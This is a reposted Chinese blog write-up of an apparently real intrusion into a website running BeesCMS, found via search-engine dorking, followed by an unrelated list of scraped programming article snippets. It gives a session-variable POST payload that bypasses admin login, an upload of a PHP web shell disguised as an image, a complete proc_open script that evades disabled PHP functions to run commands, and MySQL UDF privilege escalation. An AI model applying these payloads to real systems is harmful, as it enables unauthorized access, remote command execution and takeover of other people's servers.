安全模式 提權_記一次滲透挖洞提權實戰

摘要:這是一次挖掘cms通用漏洞時發現的網站,技術含量雖然不是很高,但是也拿出來和大家分享一下吧,希望能給一部分人帶來收獲。


0x01 進入后臺

在通過googlehack語法挖掘beescms時發現了這個站點fb30c526e397c1f4bf66e900d318a8c5.png
利用網上的payload,在/mx_form/mx_form.php?id=12頁面使用hackbarPOST以下數據

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后訪問/admin便可以直接進入后臺

0x02 拿shell

進入后臺后在‘添加產品模塊’處尋找到了上傳點

2b47447ba67fa4ac882b1c067a8e7f9c.png

嘗試上馬,但提示‘上傳圖片格式不正確’,于是上傳圖片馬抓包,在repeater里更改后綴為php,然后go

a6e9a6ddae02a705751a64f109ce026b.png

根據回顯沒有看出是否上傳成功,但也沒說失敗。經過尋找在‘上傳圖片管理’處找到

fc5532ab9d629cd03a80ff5810a70c11.png

點擊圖片發現解析了,直接菜刀連接,拿到shell

0x03 繞過安全模式

拿到shell后進入終端查看權限,但卻發現執行命令失敗,可能遠程啟用了安全模式

22bea898130b24a14eb097b0aae31aa8.png

經過在網上一番查找得出:要找到未禁用的php執行函數。先上傳了一個查看phpinfo的腳本,找到已禁用的函數

be0800ca154ee9d473993fa56e655612.png

發現proc_open函數未被禁用,于是找到如下php腳本

<?php $descriptorspec=array( //這個索引數組用力指定要用proc_open創建的子進程的描述符0=>array('pipe','r'), //STDIN1=>array('pipe','w'),//STDOUT2=>array('pipe','w') //STDERROR);$handle=proc_open('whoami',$descriptorspec,$pipes,NULL);//$pipes中保存的是子進程創建的管道對應到 PHP 這一端的文件指針($descriptorspec指定的)if(!is_resource($handle)){die('proc_open failed');}//fwrite($pipes[0],'ipconfig');print('stdout:
');while($s=fgets($pipes[1])){print_r($s);}print('===========
stderr:
');while($s=fgets($pipes[2])){print_r($s);}fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($handle);?>

上傳后可以執行命令,成功繞過安全模式

344aec16dc59188e9db2fd4dc5622b28.png

0x04 提權

上圖可以看出只是iis權限,能做的事很局限,所以要想辦法提權。
菜刀中雖然不能執行命令,但是可以查看文件,于是找到了數據庫配置文件

80cbaf5eb46552412189ef28c8af70ed.png

發現是mysql的數據庫,想到udf提權,于是上傳udf提權腳本(附件中)

461cefb5be3075f0613bcc8333128c8d.png

登錄后導出udf便可以執行命令了

71ca7af6601ffffdc6f163306e13974d.png

提權成功,但是不可以添加用戶,也不能開3389。


結語:希望路過的各位大佬可以指點迷津,也歡迎各位來找我交流探討,感謝閱讀。

參考鏈接:

PHP限制命令執行繞過https://www.cnblogs.com/R4v3n/articles/9081202.html?

d565c21a1239d4c6156354b9d1f8ca84.png

作者:?PaperPen?

來源:先知社區

如有侵權,請聯系刪除

c3d3ec259535f9a995b1cbb848665aef.gif

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/530622.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/530622.shtml
英文地址,請注明出處:http://en.pswp.cn/news/530622.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

win7無法連接打印機拒絕訪問_“Windows無法連接打印機,操作失敗,錯誤為0x000003e3”...

請求大家幫助&#xff0c;昨天在共享打印機時出現“Windows無法連接打印機&#xff0c;操作失敗&#xff0c;錯誤為0x000003e3”。在百度百科查詢的資料修改了都不行(在不重裝系統前提下&#xff0c;聯想臺式機都是win732位系統)&#xff0c;給大家一一列舉&#xff0c;請求廣大…

1108: 打印數字圖形(函數專題)

1108: 打印數字圖形&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 4040 解決: 2786 [提交] [狀態] [討論版] [命題人:admin] 題目描述 從鍵盤輸入一個整數n(1≤n≤9),打印出指定的數字圖形。要求在程序中定義并調用如下函數&#xff1a;PrintSpace…

類型全部為string_python小講堂丨學了這么久的,這6種基本數據類型你真的理解了嗎...

哈嘍&#xff0c;大家好&#xff0c;歡迎來到python小講堂&#xff0c;間歇性的努力&#xff0c;會導致持續性的一事無成&#xff0c;即使今天是除夕&#xff0c;我們也不能懈怠啊&#xff0c;今天我給大家帶來的是關于python的6種基本數據類型的深入講解&#xff0c;話不多說讓…

1105: 判斷友好數對(函數專題)

1105: 判斷友好數對&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 5790 解決: 2629 [提交] [狀態] [討論版] [命題人:admin] 題目描述 輸入兩個正整數m和n&#xff0c;順序輸出m到n之間的所有友好數對。 如果兩個整數的所有正因子之和&#xff08;…

防抖 節流_【前端面試】節流與防抖

我們用兩張圖表示什么是節流和防抖。防抖節流由圖可見&#xff0c;防抖的意思是&#xff0c;當用戶在一段時間內連續頻繁的試圖執行一個函數的時候&#xff0c;只有最后一次&#xff0c;函數被真正的執行。節流的意思是&#xff0c;當用戶在某一個時刻執行了一次函數的時候&…

沒數據時y軸不顯示_Matplotlib數據可視化

1.Matplotlib介紹什么是MatplotlibMatplotlib是一個Python的繪圖庫&#xff0c;它可與 NumPy 一起使用&#xff0c;可以代替MMatplotlib安裝由于Matplotlib是第三方庫&#xff0c;所以我們需要安裝它才可以使用。注意&#xff0c;Matplotlib3.0要求python3版本才可安裝使用。安…

1099: 角谷猜想(多實例測試)

1099: 角谷猜想&#xff08;多實例測試&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 5930 解決: 3888 [提交] [狀態] [討論版] [命題人:admin] 題目描述 任何一個自然數&#xff0c;如果是偶數&#xff0c;就除以2&#xff0c;如果是奇數&#xff0c;就乘以3再加1。最…

python軟件運行界面_python運行界面 python的圖形用戶界面怎么運行

為什么用Python開發界面應用程序1)wxWidgets是一個比MFC優雅的庫&#xff0c;TortoiseCVS用wxWidges而不用MFC&#xff0c;就是因為wxWidgets好用&#xff0c;而不是為了可以移植。 2)Python的面向對象腳本語言編程適合快速界面開發 3)Python在服務器端和客戶端都非常有前途&am…

1100: 求組合數(函數專題)

1100: 求組合數&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 6264 解決: 4653 [提交] [狀態] [討論版] [命題人:admin] 題目描述 馬上要舉辦新生程序設計競賽了&#xff0c;與以往不同的是&#xff0c;本次比賽以班為單位&#xff0c;為了全面衡量…

python畫圖隱藏畫筆_python畫圖

轉至&#xff1a;https://blog.csdn.net/weixin_43943977/article/details/1026913921、灰色櫻花樹from turtle import *from random import *from math import *def tree(n,l):pd()#下筆#陰影效果t cos(radians(heading()45))/80.25pencolor(t,t,t)pensize(n/3)forward(l)#畫…

1101: 逆序數字(函數專題)

1101: 逆序數字&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 6333 解決: 4717 [提交] [狀態] [討論版] [命題人:admin] 題目描述 輸入一個正整數n&#xff0c;計算n的逆序數m&#xff0c;輸出m與n的和。要求程序定義一個inverse()函數和一個main(…

循環劃線_經濟內外雙循環下的思考!

原創&#xff1a;群贏說到這個內外雙循環&#xff0c;我們汽車后市場朋友們&#xff0c;應該知道車子發動機水冷系統就是一個雙循環&#xff0c;內部小循環&#xff0c;外部大循環。在發動機溫度不高的時候&#xff0c;水在做小循環&#xff0c;在發動機周邊流動。當發動機溫度…

1103: 平均學分績點(函數專題)

1103: 平均學分績點&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 5386 解決: 2917 [提交] [狀態] [討論版] [命題人:admin] 題目描述 平均學分績點&#xff08;Grade Point Average&#xff0c;即GPA&#xff09;是以學分與績點作為衡量學生學習的…

1102: 火車票退票費計算(函數專題)

1102: 火車票退票費計算&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 5055 解決: 3204 [提交] [狀態] [討論版] [命題人:admin] 題目描述 2013年起&#xff0c;火車票退票費比例下調&#xff1a;票面乘車站開車時間前48小時以上的按票價5%計退票費…

ksrot php_php中ksort函數的功能起什么作用呢?

摘要:下文講述php中ksort函數的功能講解&#xff0c;如下所示&#xff1b;ksort函數功能說明:根據數組的鍵名進行升序排列ksort語法:ksort(array,sortingtype);--------參數說明------array:必填參數,待進行操作的數組sortingtype&#xff1a;非必填參數&#xff0c;此參數值可…

1104: 求因子和(函數專題)

1104: 求因子和&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 4633 解決: 3669 [提交] [狀態] [討論版] [命題人:admin] 題目描述 輸入正整數n&#xff08;2<n<1000&#xff09;&#xff0c;計算并輸出n的所有正因子(包括1&#xff0c;不包括…

計算機組成原理實驗軟件仿真系統_計算機系統組成原理(基礎)

網上關于計算機系統的討論眾說紛紜。剛開始&#xff0c;我卯足了勁想尋找一個標準答案&#xff0c;后來發現這并不存在&#xff01;因為計算機系統層次不一&#xff0c;看你從什么角度來理解這個問題。在這篇文章里&#xff0c;我的介紹一切從簡&#xff0c;不求錦上添花&#…

1107: 回文數猜想(函數專題)

1107: 回文數猜想&#xff08;函數專題&#xff09; 時間限制: 1 Sec 內存限制: 128 MB 提交: 3922 解決: 2508 [提交] [狀態] [討論版] [命題人:admin] 題目描述 一個正整數&#xff0c;如果從左向右讀&#xff08;稱之為正序數&#xff09;和從右向左讀&#xff08;稱之為倒序…

機器人總動員中的小草_機器人總動員讀后感

1機器人總動員讀后感機器人總動員讀后感(一)昨天&#xff0c;我看了一部電影《機器人總動員》&#xff0c;主人公是一個機器人&#xff0c;它叫瓦力。非常好看。這部電影講的是幾百年以后&#xff0c;地球被人們弄得全是垃圾&#xff0c;人類沒辦法在地球上生活了&#xff0c;只…

輸入回車時結束循環python_python-用戶輸入退出以在循環時中斷

最簡單的解決方案可能是創建一個函數,該函數將顯示的消息作為輸入,并在測試其滿足條件后返回用戶輸入&#xff1a;def guess_input(input_message):flag False#endless loop until we are satisfied with the inputwhile True:#asking for user inputguess input(input_messa…